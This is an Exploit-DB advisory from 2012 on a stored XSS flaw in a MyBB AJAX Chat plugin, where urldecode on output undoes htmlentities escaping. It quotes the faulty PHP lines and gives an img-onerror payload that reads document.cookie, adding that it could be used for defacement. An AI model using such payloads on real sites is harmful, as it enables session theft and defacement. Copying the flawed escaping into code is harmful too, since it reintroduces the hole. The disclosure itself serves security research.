MyBB AJAX Chat - Persistent XSS Vulnerability

ID EDB-ID:23354
Type exploitdb
Reporter Mr. P-teo
Modified 2012-12-13T00:00:00


MyBB AJAX Chat - Persistent XSS Vulnerability. Webapps exploit for php platform

                                            # Title: MyBB AJAX Chat Persistent XSS Vulnerability
# Date: 12/12/2012
# Exploit Author: Mr. P-teo
# Vendor Homepage:
# Software Link:
# Version: 1
# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filter with the htmlentities function below.

	$db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));


The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

	$msg = urldecode($row["message"]);


The vulnerability can be exploited via the following line, decoded as - "><img src="XSS" onerror="alert(document.cookie)" />


This can be expanded on with defaces etc, alert is just a basic example.

Brought to you be Mr. P-teo.